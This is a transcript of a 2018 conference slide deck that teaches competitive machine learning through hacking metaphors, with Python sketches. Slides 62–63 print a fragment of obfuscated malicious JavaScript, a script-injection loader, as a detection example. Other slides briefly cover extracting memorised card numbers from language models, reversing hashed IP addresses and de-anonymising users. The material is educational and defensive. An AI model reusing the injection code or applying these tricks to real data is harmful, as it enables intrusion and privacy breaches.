Hacking Predictive Modeling - RoadSec 2018

  1. Hacking Predictive Modeling HJ van Veen - Data Science & InfoSec @ Nubank
  2. “Do machine learning like the great [hacker] you are, not like the great machine learning expert you aren’t.” - Zinkevich
 Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
  3. Who am I? • Thankful for the opportunity to speak here! • Data scientist & InfoSec analyst at Nubank
 • Competitive data science fanatic
 • Horrible Portuguese speaker (more so with public speaking). Questions and clarifications in English please.
 • @mlwave
  4. Disclaimer • These slides are for entertainment, educational and research purposes only.
 • ML is powerful and easy: “Since every scientific discovery gives more power over nature, it can increase good or evil.” - César Lattes
 • Hacking is fun: But not a substitute for rigorous study and theory. Think of the impact your ML solution has on users.
  5. Scope • This presentation will be all over the place: I don’t know whether you have never trained a model before or are already experienced with ML.
 • But I hope this presentation will be interesting for hackers, makers, and creators of all types.
 • Catch me afterwards, if you want to talk about hyper optimization.

  6. What is AI?
  7. What is AI? Self-Normalizing Neural Networks (2017, Klambauer et al.) A Tutorial on Energy-Based Learning (2006, LeCun et al.)
  8. What is AI?
  9. What is AI? Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.) Boy holds baseball bat Cat sits on couch
  10. What is AI? • AI grew out of Operations Research after WWII
 • AI consists of many diverse subfields, including: Psychology, Neuroscience, Mathematics, Linguistics, Learning Theory, (Quantum) Physics, Computer Science, Information Theory, Statistics, Robotics, Philosophy, Machine Learning.
 • Fight hype. Just replace the word `AI` with `Software`: if the result sounds silly or obvious, then the application of AI usually is too. Power question: “What is your false positive rate?”

  11. What is Machine Learning? • Automatically learn from data
 • Increased business usage: AI, Machine Learning, Software will continue eating the world.
 • Unsupervised learning (Amazon Recommendations). Supervised learning (Spam classification). Reinforcement learning & Self-supervision/Self-play (AlphaGo).
 • Consists of: Engineering, research, data management, domain expertise, analysis, decision science, safety, legal, ethics, UX, monitoring, predictive modeling.
 Why Software Is Eating the World (2016, Andreessen Horowitz)
  12. What is Predictive Modeling? • Puts the focus on creating predictions:
 • Use of model, • how to use the data, • how to get good accuracy.
 • Essential for creating a first solution, but only the bare minimum of what goes into Machine Learning at commercial scale. ML competitions are largely about predictive modeling.
  13. Useful Paradigms • Functionalism: Input -> Function -> Output
 • Connectionism: Learn from data bottom-up, not top-down by stacking learning primitives.
 • Black Box Learning: Let the machine do the work. Don’t care if I understand what it does.
 • Coding Theory: Error detection and compression
  14. Functionalism • Philosophy of Mind: Mental states are defined by how they function, not defined by what they are made of. • Function does not depend on the material: You can build a functional mouse trap from wood or metal.
 • Perhaps we can model functional intelligence with computers too?

  15. Functionalism
     Input -> Transform -> Model -> Output
     Reality -> Sensory Processing -> Mental Modeling -> Behavior
     Data -> Feature Engineering -> Predictive Modeling -> Predictions
  16. Connectionism • Philosophy of Mind: Cognition can arise by connecting functional nodes to form a network structure.
 • Artificial Neural Nets & Deep Learning are examples of this approach: Stacking layers of nodes for ever higher-level learning
 • Perhaps we can model intelligence with network architectures too?
 Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
  17. Connectionism [Figure labels: Image Demons, Feature Demons, Cognitive Demons, Decision Demons] Pandemonium: A paradigm for learning. (Selfridge, 1959)
  18. Black Box ML • View machine learning models as a black box: You only care about what goes in, and what goes out (its function). "A labrador retriever puppy with tongue hanging out"
  19. Black Box ML • View machine learning models as a black box: You only care about what goes in, and what goes out (its function).
 • Don’t care if there is a magical demon or a complex maths formula in the box.
 • Question then becomes: How to transform the data, and how to parametrize the black box, so as to get the best predictions?
 • Remember: Garbage in - Garbage out (Don’t trust for critical stuff like healthcare or self-driving cars or AGI)
 The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
  20. Coding Theory • Coding theory is concerned with effective communication and data integrity • Cryptography, Error Correction, Data Compression: All about finding (or hiding) the signal in the noise. • Machine Learning is essentially learning to correct errors. • Data compression, just like ML, is about finding the most relevant patterns.
  21. Coding Theory 1 MegaByte 180 KiloByte
  22. Data • Data can be structured or unstructured. • Tabular data is structured and can more readily be used
 • Text and Sound and Images are unstructured
 • Data can be temporal, for instance: time-series
 • Rarely, data is in shape of a graph (for instance, relations between gang members)
  23. Feature Engineering • Most data needs to be converted to numbers first
 • Feature engineering:
     Input -> Transform -> Model -> Output
     Data -> Feature Engineering -> Predictive Modeling -> Predictions
  24. Feature Engineering • Most data needs to be converted to numbers first
 • Feature engineering:
 • is transforming data into something a model can understand. • Creative part of ML with enough tricks to write a book • Has a few basic tricks that are enough to get most models to work well.
 Feature Extraction - Foundations and Applications (Guyon et al., 2006)
  25. Feature Engineering: Tricks • Categorical Variables
 • Label encoding for decision trees:
     Red   -> 1
     Green -> 2
     Blue  -> 3
 • One-hot encoding for neural nets:
            Red  Green  Blue
     Red     1     0     0
     Green   0     1     0
     Blue    0     0     1
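A minimal sketch of the two encodings in plain Python. The helper names `label_encode` and `one_hot_encode` are made up for this illustration; in practice a library such as Pandas or Scikit-Learn would usually do this for you.

```python
def label_encode(values):
    """Map each category to an integer, in order of first appearance (starting at 1)."""
    mapping = {cat: i for i, cat in enumerate(dict.fromkeys(values), start=1)}
    return [mapping[v] for v in values], mapping


def one_hot_encode(values):
    """Turn each value into a 0/1 vector with one slot per category."""
    categories = list(dict.fromkeys(values))
    return [[1 if v == cat else 0 for cat in categories] for v in values], categories


colors = ["Red", "Green", "Blue", "Green"]
labels, mapping = label_encode(colors)
one_hot, categories = one_hot_encode(colors)

print(labels)   # one integer per row
print(one_hot)  # one 0/1 vector per row
```

Label encoding keeps a single column, which tree models can split on; one-hot encoding avoids implying an order between categories, which matters more for neural nets and linear models.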
  26. Feature Engineering: Tricks • That’s really (mostly) it!
 • You can now apply the most advanced machine learning algorithms to data and something you want to predict.
 • More advanced feature engineering uses domain expertise, intuition, unsupervised learning/embeddings, and automation (see FeatureTools).
 Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
  27. Modeling • A model tries to give accurate predictions for new unseen data. • It uses training data together with labels/ground truth/what you want to predict.
     Input -> Transform -> Model -> Output
     Data -> Feature Engineering -> Predictive Modeling -> Predictions
  28. Modeling
     Gender  Likes Open Source?  Wants RoadSec ticket?
     1       1                   1
     0       1                   1
     1       1                   0
     0       1                   1
     1       0                   0
     0       0                   0
     1       0                   0
     0       0                   0
  29. Modeling
     Gender  Likes Open Source?  Wants RoadSec ticket?
     0       1                   ?
 • Gender did not show any correlation, and 3/4 of the people who like Open Source also wanted a RoadSec ticket.
 • A good model may predict a probability of 0.75, or a hard prediction of 1.
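The 0.75 can be reproduced with a few lines of Python. This is only a sketch: the rows are read off the toy table in the slides (three values per row), and `ticket_probability` is a made-up helper that simply counts, not a real learning algorithm.

```python
# Toy table from the slides: (gender, likes_open_source, wants_ticket)
rows = [
    (1, 1, 1), (0, 1, 1), (1, 1, 0), (0, 1, 1),
    (1, 0, 0), (0, 0, 0), (1, 0, 0), (0, 0, 0),
]


def ticket_probability(rows, likes_open_source):
    """Fraction of matching training rows that wanted a ticket."""
    matches = [wants for _, likes, wants in rows if likes == likes_open_source]
    return sum(matches) / len(matches)


new_person = {"gender": 0, "likes_open_source": 1}
probability = ticket_probability(rows, new_person["likes_open_source"])
hard_prediction = int(probability >= 0.5)  # threshold the probability
print(probability, hard_prediction)
```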
  30. Modeling • What model do you use for data? 
 • Tabular data: Gradient boosted decision trees (XGBoost)
 • Images: Pre-trained deep neural net (or Detectron)
 • Text: TFIDF -> Logistic Regression (or FastText, ULMFiT, BERT)
 Search for the above terms in combination with “machine learning”.
  31. Evaluation
     Gender  Likes Open Source?  Wants RoadSec ticket?
     1       1                   1
     0       1                   1
     1       1                   0
     0       1                   1
     1       0                   0
     0       0                   0
     1       0                   0
     0       0                   0
  32. Evaluation [Figure: the same table, with rows marked Train and Predict] The Elements of Statistical Learning (2001, Friedman et al.)
  33. Evaluation [Figure: the same table, with rows marked Train and Predict]
  34. Evaluation
     Predictions  Wants RoadSec ticket?
     1            1
     1            1
     1            0
     1            1
     0            0
     0            0
     0            0
     0            0
     Accuracy Score: 7/8
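The accuracy score on this slide is just the share of predictions that match the ground truth. A minimal sketch, with the two columns copied from the slide and `accuracy` as an illustrative helper name:

```python
def accuracy(predictions, actual):
    """Share of predictions that match the ground truth."""
    correct = sum(p == a for p, a in zip(predictions, actual))
    return correct / len(actual)


predictions = [1, 1, 1, 1, 0, 0, 0, 0]
wants_ticket = [1, 1, 0, 1, 0, 0, 0, 0]
score = accuracy(predictions, wants_ticket)
print(score)  # 0.875, i.e. 7/8
```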
  35. Optimization • A Python classifier may look like:
     FactorizationMachineBinaryClassifier(
         iters=5, learning_rate=0.1, latent_dim=20, radius=0.5,
         lambda_linear=0.0001, lambda_latent=0.0001, normalize='Auto',
         norm=True, caching='Auto', shuffle=True, verbose=True)
 • The trick is to tweak these parameters to get a better evaluation. Then stop when any change makes the evaluation worse.
  36. Brute Forcing • View hyper parameter optimization as a password cracking task
 • Enumerate or randomly try all possible parameters within a range.
 • Dictionary attack: Use “password dictionary files” with good parameters that worked on other problems. Try these first.
 • This is basically Random Search or Adaptive Search
 Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
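A rough sketch of the "dictionary attack plus random guessing" idea. Everything here is illustrative: `evaluate` is a made-up stand-in for a real cross-validation score, and the parameter names and ranges are assumptions, not settings recommended in the talk.

```python
import random


def evaluate(params):
    """Hypothetical stand-in for a cross-validation score (higher is better)."""
    return -((params["learning_rate"] - 0.1) ** 2) - ((params["max_depth"] - 6) ** 2) / 100


def sample_params(rng):
    """Draw one random candidate from a hand-picked range."""
    return {
        "learning_rate": 10 ** rng.uniform(-3, 0),  # log-uniform in [0.001, 1]
        "max_depth": rng.randint(2, 12),
    }


# "Password dictionary": settings that worked on other problems, tried first.
dictionary = [
    {"learning_rate": 0.3, "max_depth": 6},
    {"learning_rate": 0.05, "max_depth": 8},
]

rng = random.Random(0)
candidates = dictionary + [sample_params(rng) for _ in range(50)]
best_params = max(candidates, key=evaluate)
best_score = evaluate(best_params)
print(best_params, best_score)
```

In a real run, `evaluate` would train a model with the given parameters and return its local validation score, so each candidate costs one training run.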
  37. Brute Forcing • How to find the best weights for an average ensemble? • Is it differentiable? • Which optimizer do we pick? • Do we set any regularization? • Allow negative weights?
 • How about trying every possible combination of weights and pick the best evaluation? Worst case: you spend 2 hours more compute.
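A small sketch of brute-forcing the weight of a two-model average. The labels and predictions are made up for illustration, and log loss is an assumed choice of evaluation metric; with more models you would loop over every combination of weights in the same way.

```python
import math


def log_loss(labels, probabilities):
    """Mean negative log-likelihood of binary labels (lower is better)."""
    eps = 1e-15
    total = 0.0
    for y, p in zip(labels, probabilities):
        p = min(max(p, eps), 1 - eps)
        total += -(y * math.log(p) + (1 - y) * math.log(1 - p))
    return total / len(labels)


def blend(weight, preds_a, preds_b):
    """Weighted average of two prediction lists."""
    return [weight * a + (1 - weight) * b for a, b in zip(preds_a, preds_b)]


# Made-up validation labels and predictions from two hypothetical models.
labels = [1, 0, 1, 1, 0, 0, 1, 0]
model_a = [0.9, 0.4, 0.6, 0.7, 0.2, 0.5, 0.4, 0.1]
model_b = [0.6, 0.1, 0.8, 0.5, 0.4, 0.2, 0.7, 0.3]

weights = [i / 20 for i in range(21)]  # 0.00, 0.05, ..., 1.00
best_weight = min(weights, key=lambda w: log_loss(labels, blend(w, model_a, model_b)))
best_loss = log_loss(labels, blend(best_weight, model_a, model_b))
print(best_weight, best_loss)
```

Because the grid includes weights 0 and 1, the blended result can never score worse on the validation data than either model alone.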
  38. Brute Forcing • Do we really need to manually train all these models?
 • What would happen if we automatically train 1,000 random models with random data transformations and throw them all into another black box?
 • Out comes a winning Kaggle submission… 
 Kaggle Ensembling Guide (van Veen et al., 2015)
  39. Fuzzing with Permutations • View feature interaction expansion/feature selection as a fuzzing task.
 • Train a model and evaluate on test set.
 • For every column in test set:
   • Randomly shuffle the column
   • Evaluate the new predictions
   • If the evaluation is better with the column randomly shuffled, then you can safely discard the column.
 Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle See Fast.AI tutorial for more on this technique.
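The shuffle-and-re-evaluate loop can be sketched in plain Python. This is a toy illustration, not the method from the cited paper: `predict` is a hard-coded stand-in for a trained model, the data is the small ticket table from the earlier slides, and the same rows serve as the evaluation set to keep the example short.

```python
import random

# Toy table from the slides: (gender, likes_open_source) -> wants_ticket
X = [[1, 1], [0, 1], [1, 1], [0, 1], [1, 0], [0, 0], [1, 0], [0, 0]]
y = [1, 1, 0, 1, 0, 0, 0, 0]
columns = ["gender", "likes_open_source"]


def predict(row):
    """Stand-in for a trained model: predicts a ticket for Open Source fans."""
    return row[1]


def accuracy(rows, labels):
    return sum(predict(r) == t for r, t in zip(rows, labels)) / len(labels)


def permutation_importance(rows, labels, column, rng, repeats=20):
    """Average drop in accuracy after randomly shuffling one column."""
    baseline = accuracy(rows, labels)
    drops = []
    for _ in range(repeats):
        shuffled = [r[column] for r in rows]
        rng.shuffle(shuffled)
        permuted = [r[:column] + [v] + r[column + 1:] for r, v in zip(rows, shuffled)]
        drops.append(baseline - accuracy(permuted, labels))
    return sum(drops) / repeats


rng = random.Random(0)
importance = {name: permutation_importance(X, y, i, rng) for i, name in enumerate(columns)}
print(importance)
```

A column whose importance is zero or negative (shuffling it does not hurt, or even helps) is a candidate for removal.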
  40. Script kiddies • Use tools developed by others to attack a machine learning problem. • ML Community is incentivized to share easily replicable code. • Wield same power as the biggest AI companies in the world. • No shame in this! Start somewhere, why not near the top?

  41. Warez • Good tools: 
 • allow you to experiment and iterate quickly
 • have an active community contributing new features
 • can be applied to many different problems with similar results.
 • abstract away complexity.

  42. Python • Grown to be essential to data science and machine learning. 
 • Learn Python The Hard Way and you have access to an amazing machine learning stack. • Then learn “one-- and preferably only one --obvious way to do it.” • Python code can read like pseudo-code
 PEP 20 — The Zen of Python (Peters, 2004) Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)
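  43. Python
     from sklearn import datasets, ensemble

     # Load the classic iris flower data set.
     iris = datasets.load_iris()
     X = iris.data    # features
     y = iris.target  # labels

     # Train a gradient boosted tree model and predict on the same data.
     model = ensemble.GradientBoostingClassifier()
     model.fit(X, y)
     p = model.predict(X)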

  44. Scikit-Learn • The Metasploit of Machine Learning
 • Uses one API for all models (models are all trained the same way, so learn it only once, and have access to all models)
 • Could get by for a while learning only this library very well
 Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
  45. XGBoost • The best for tabular data: 
 • Extremely fast • Very good performance • Can model complex problems • Supports Scikit-Learn API
 • Alternatives: GradientBoostingClassifier, CatBoost, LightGBM. XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
  46. Keras • User-friendly wrapper around deep learning libraries such as TensorFlow.
 • Learn Keras and you can work with the latest architectures in deep learning.
 • Alternatives: PyTorch with Fast.AI library
 Deep Learning with Python (Chollet, 2017)
  47. Vowpal Wabbit • Very fast online learning on data bigger than memory
 • Can be faster and more accurate than Hadoop/Spark
 • Uses cool hashing trick inspired by Bloom filter
 • Support for contextual bandits (automated decision making)
 • Eats raw features:
     1 '10000074 |f category_x_transport emails_cnt:0.0 emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii exclamationmark 2005
 A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
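To give a feel for the hashing trick, here is a minimal sketch in plain Python. It is not Vowpal Wabbit's implementation: `zlib.crc32` stands in for its hash function, `hash_features` is a made-up helper, and the 18-bit table size is an assumption for this example.

```python
import zlib


def hash_features(tokens, bits=18):
    """Map 'name' or 'name:value' tokens to a sparse {index: value} vector."""
    size = 2 ** bits
    vector = {}
    for token in tokens:
        name, _, value = token.partition(":")
        index = zlib.crc32(name.encode("utf-8")) % size
        # Colliding features simply add up; no dictionary of names is stored.
        vector[index] = vector.get(index, 0.0) + (float(value) if value else 1.0)
    return vector


tokens = "category_x_transport emails_cnt:0.0 emails_cnt_x_0 exclamationmark 2005".split()
sparse = hash_features(tokens)
print(sparse)
```

Because every feature name is hashed straight to a slot in a fixed-size weight table, memory use stays constant no matter how many distinct raw features show up in the stream.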
  48. Pandas & NumPy & SciPy • Read and manipulate tabular data with Pandas
 • Fast, scalable and supports many types of data
 • Perform vector operations on NumPy (or Numba) arrays
 • Wide support for scientific calculations 
 Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
  49. Reverse Engineering • Use frequency tables to reverse engineer the data to its original form.
 • label:TF -> English_word_frequency(IDF(label)) -> Porter_Stemmer(word):TF*IDF
 • feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) -> State:New_York
 Tricks as seen on the Kaggle forums
  50. Reverse Engineering • Use model predictions to reverse engineer the training data.
 • Simple brute-force can use fitted language models to retrieve:
   • Credit Card Numbers
   • Social Security Numbers / CPFs
 • This works even if the model has seen the secret only once (DL is good at memorization).
 The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
  51. Social Engineering • You cannot survive in most businesses with just predictive modeling.
 • Companies don’t hire an AutoML solution, they hire people.
 • The majority of the day-to-day complexity in the chain between data infrastructure and decision makers is social, not technical.
  52. Social Engineering • How to gain access to online data science community?
 • Compete together. • Write a cool blog about it. • Write/contribute Open Source projects. • Write tutorials/step-by-step’s.
 • Basically share everything: A 100-line Python script (toy wrapper for Regularized Greedy Forest) could grow to a professional project that you now can use yourself. https://github.com/RGF-team/rgf
  53. Operational Security • Business: • Keep pipelines simple • Document & Revisit • Automate, Test & Monitor
 • Competitions: • Loose lips sink ships: Be careful what competitive advantage you share • Show not tell: Save your most powerful models ‘till the very last
  54. Hacking Leaderboards • Always wanted to rank #1 on a leaderboard?
 • Wacky Boosting: • Keep changing your submission • use leaderboard feedback to see if it was a good change or a bad change. • Keep good changes. • Repeat until you are #1
 • Will horribly overfit, but can also cause others to overfit! Competing in a data science contest without reading the data (2015, Hardt)
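The keep-good-changes loop can be simulated in a few lines. This is a simplified hill-climbing sketch under made-up assumptions (random hidden labels, a 50/50 public/private split, 500 submissions), not the exact procedure from the cited post.

```python
import random

rng = random.Random(0)
n = 200
truth = [rng.randint(0, 1) for _ in range(n)]  # hidden labels (hypothetical)
public_idx = list(range(0, n // 2))             # rows scored on the public leaderboard
private_idx = list(range(n // 2, n))            # rows scored only at the end


def score(submission, idx):
    """Accuracy of a submission on the given rows."""
    return sum(submission[i] == truth[i] for i in idx) / len(idx)


submission = [rng.randint(0, 1) for _ in range(n)]  # start from random guesses
initial_public = score(submission, public_idx)

for _ in range(500):
    candidate = submission[:]
    for i in rng.sample(range(n), 10):  # change a few answers at random
        candidate[i] = 1 - candidate[i]
    # Keep the change only if the public leaderboard says it was not worse.
    if score(candidate, public_idx) >= score(submission, public_idx):
        submission = candidate

final_public = score(submission, public_idx)
final_private = score(submission, private_idx)
print(initial_public, final_public, final_private)
```

The public score can only go up, while the private rows receive no feedback at all, which is the overfitting the slide warns about.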
  55. Information Snooping • Normally not advisable to use the test set. But for competitions the test set is available, so:
 • Can use semi-supervised learning to extract information from the test set. Use test set for:
 • Frequency (TFIDF) or pre-training language models • Fitting dimensionality reduction • Adding confident predictions as labels to train set github.com/gatapia Guido Tapia
  56. Rainbow tables • Sometimes categorical variables are hashed to obscure them.
 • Can use rainbow tables to reverse (truncated) MD5 hash and get the original feature.
 • One time, this was obfuscated ordinals for a job puzzle • One time, this was private data: IP addresses. Oops! • One time, they forgot to obfuscate a misspelled patient name in a psychiatric report. Oops!
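When the space of possible original values is small, reversing a truncated hash needs nothing more than a precomputed lookup table. The sketch below uses a plain dictionary rather than a true rainbow table (which trades memory for time using hash chains), and it assumes the hidden values are IPv4 addresses from one small, known range and that the hash was cut to 10 hex characters.

```python
import hashlib
import ipaddress


def truncated_md5(value, length=10):
    """First `length` hex characters of the MD5 digest."""
    return hashlib.md5(value.encode("utf-8")).hexdigest()[:length]


# Assumption: the hidden values are IPv4 addresses from a small known range.
candidates = (str(ip) for ip in ipaddress.ip_network("192.168.0.0/24"))
lookup = {truncated_md5(ip): ip for ip in candidates}

obfuscated = truncated_md5("192.168.0.42")  # what a dataset column might contain
recovered = lookup.get(obfuscated)
print(obfuscated, "->", recovered)
```

The whole IPv4 space has only about 4.3 billion values, which is why hashing IP addresses without a secret salt offers little protection.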
  57. Breaking Stuff • Keep asking your curious self: What would happen if I changed this to that? Be Bold!
 • Local evaluation is your lifeline.
 • Try everything, keep the good.
 • Once I got an accuracy of 181% by submitting correct answers twice.
 [Figure labels: Statisticians, Machine Learners, Smart Machine Learner, CV. The joke is that there are only smart statisticians.]
 Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
  58. DataLeaks • A very common mistake. Can be deadly for business and science, so become good at finding leaks. • The task was to predict cancer. One of the variables was “underwent surgery for cancer, yes/no?” • You can not use data that is not reasonably available at test time (or your lifeline evaluation can not be trusted). Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
  59. DataLeaks • Beware: The more powerful your model, the bigger the chance that it exploits any remaining leakage you did not find. • The most powerful model is 1,000 data scientists on a typewriter, which is why competitions see larger leakage discovery.
 • A large sample of leakage may simply go undetected. Ben Hamner & Will Cukierski @ Kaggle
  60. DataLeaks • Winners of Microsoft malware binary classification 2015 were able to extract the desktop icon from the code. Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
  61. Sub-Linear Debugging • Output information while your computations are running, essential for iteration speed: • Can spot very fast if some change was good or bad. • Feels like NEO in the Matrix if you do this with the data itself during data reading. • Can spot data health issues (text encoding errors, all missing in the same row of data, etc.) Online Learning and Sub-Linear Debugging (Mineiro, 2014)
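One way to get this kind of running feedback is to print the average loss so far at exponentially spaced checkpoints, so a run over millions of rows produces only a handful of lines. A minimal sketch, with `progressive_reports` as a made-up helper and synthetic per-example losses standing in for a real learner:

```python
def progressive_reports(losses):
    """Yield (examples_seen, mean_loss_so_far) at 1, 2, 4, 8, ... examples."""
    total = 0.0
    next_report = 1
    for seen, loss in enumerate(losses, start=1):
        total += loss
        if seen == next_report:
            yield seen, total / seen
            next_report *= 2


# Made-up per-example losses that shrink as a hypothetical learner improves.
losses = (1.0 / (i ** 0.5) for i in range(1, 1001))
reports = list(progressive_reports(losses))
for seen, mean_loss in reports:
    print(f"{seen:>6} examples  mean loss {mean_loss:.4f}")
```

The first few lines appear almost immediately, so a bad change often shows up long before the full pass over the data has finished.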
  62. Error Debugging • See where your model makes the biggest mistakes. • Then try to fix it by creating new features • Below sample confidently predicted as minified JS when it was actually obfuscated malicious JS:
 4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31 x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65"," x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]= true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][ Warsaw.js
  63. Error Debugging • How to fix? • Add count of numbers / count of characters • Add human-readability score • Add count of “x” / count of characters
 4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31 x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65"," x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]= true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
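Two of the proposed fixes are simple character ratios. A minimal sketch (the function name and the sample strings are illustrative; the human-readability score is left out because the slides do not say how it was computed):

```python
def char_ratio_features(source):
    """Ratios of digits and of the letter 'x' to all characters in a script."""
    n = max(len(source), 1)  # avoid dividing by zero on empty input
    return {
        "digit_ratio": sum(ch.isdigit() for ch in source) / n,
        "x_ratio": source.count("x") / n,
    }


obfuscated = "x67x65x74x45x6Cx65x6Dx65x6Ex74"        # hex-escaped, as in the sample
plain = "function add(a, b) { return a + b; }"       # ordinary readable JS

print(char_ratio_features(obfuscated))
print(char_ratio_features(plain))
```

Hex-escaped strings push both ratios far above what ordinary or merely minified code produces, which gives the model a direct signal for this kind of mistake.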
  64. Dumpster Diving • You should find out the sources and shapes of all your data, then do a deep dive:
 • Winners of the IJCNN 2011 Challenge wrote a Flickr crawler to de-anonymize users and obtain the ground truth.
 • Winners of the West Nile Virus Prediction Challenge found research papers which contained part of the ground truth.
 Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayanan et al.)
  65. Adversarial Input • These people are invisible to % of modern face detection CV Dazzle (Harvey et al., 2010)
  66. Adversarial Input • This image is confusing to modern object detection “A foreign attack helicopter firing missiles” Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
  67. Adversarial Input • Being able to fool neural networks, or build strong defenses against adversarial images is hugely valuable.
 • NIPS2018: Defense Against Adversarial Attack • Goodfellow et al.: CleverHans • Google: Unrestricted Adversarial Examples Challenge
  68. Adversarial Thinking • Pretend you are an Identity Fraudster: • Do you hack at night or during your day job/school? • Do you change details like email to match your victim’s name? • Are you more likely to use Windows or Linux? • Do you move location often, or use Tor to hide your location? • Do you try to get as much money as fast as possible or more patient? • Do you memorize your victim’s personal details?

  69. Adversarial Thinking • Try to attack a system, then invent safeguards:
   • Encode time of day of the attempt
   • Look at string distance between legal name and email name
   • Deduce operating system from user agent string
   • Check if IP was used for malicious behavior before
   • Check if IP is a Tor IP
   • Check how long the user spends in the funnel / form behavior
   • Check if the user demands an unusually high limit
   • …
 Statistical Fraud Detection: A Review (Bolton et al., 2002)
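Two of these safeguards translate directly into features. The sketch below is illustrative only: the function names, the "night" cutoff of 6:00, and the use of `difflib.SequenceMatcher` as the string-distance measure are all assumptions, not the checks actually used in production anywhere.

```python
from datetime import datetime
from difflib import SequenceMatcher


def letters_only(text):
    """Lowercase the text and drop everything that is not a letter."""
    return "".join(ch for ch in text.lower() if ch.isalpha())


def name_email_similarity(legal_name, email):
    """Similarity in [0, 1] between the legal name and the email's local part."""
    local_part = email.split("@", 1)[0]
    return SequenceMatcher(None, letters_only(legal_name), letters_only(local_part)).ratio()


def attempt_features(legal_name, email, timestamp):
    """Encode one sign-up attempt as model features."""
    return {
        "hour_of_day": timestamp.hour,
        "is_night": timestamp.hour < 6,  # assumed cutoff for "at night"
        "name_email_similarity": name_email_similarity(legal_name, email),
    }


features = attempt_features("Maria Silva", "maria.silva@example.com", datetime(2018, 11, 10, 3, 15))
print(features)
```

Neither feature proves fraud on its own; they only give the model the signals that the adversarial-thinking exercise suggested might matter.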
  70. Botnet • Much of commercial ML can be or is being automated. Much of advertisement fraud is automated already.
 • It is possible to get a good score in a competition completely automatically.
 • You can aggregate the results of many (automated) agents and get an even better result.
 • Thinking back to the ID fraudster example: Can you imagine how to cheat an ML competition? Could you encode ways to safeguard against this?
 Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
  71. Case Study: Higgs Boson • “Science cannot predict what will happen. It can only predict the probability of something happening.” - César Lattes
 • Use data from the ATLAS experiment to identify the Higgs boson (probability of it being signal or background noise)
 • No knowledge of particle physics is required.
 • XGBoost was a 0-day during competition (This could’ve been you!) Higgs Boson Detection Challenge (2014, Kaggle & CERN)
  72. Case Study: Higgs Boson • Let’s hack together a solution:
   • Create random feature interactions and use Permutation Feature Importance to select the best ones
   • Add the best interactions to the data
   • Train 50 randomly initialized XGBoost models
   • Pick the model with the best log loss, lower the learning rate, and use early stopping to find the best number of trees.
   • Repeat the above 3 times and average the results
 Position: 30/1785
  73. Further Learning
 • MOOCs: Andrew Ng’s Machine Learning on Coursera, Competitive Data Science Coursera, Abu-Mostafa Caltech Learning from Data
 • Platforms: Kaggle (Tutorials, Projects, Competitions, Forums, Kernels)
 • Programs: Fast.AI (Learn deep learning state-of-the-art)
 • Meetups: Sao Paulo Machine Learning Meetup
 • Books: Programming Collective Intelligence
 • Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun!
 • Professors: Find a cool professor and study their online output
  74. nubank.workable.com Nubank is hiring!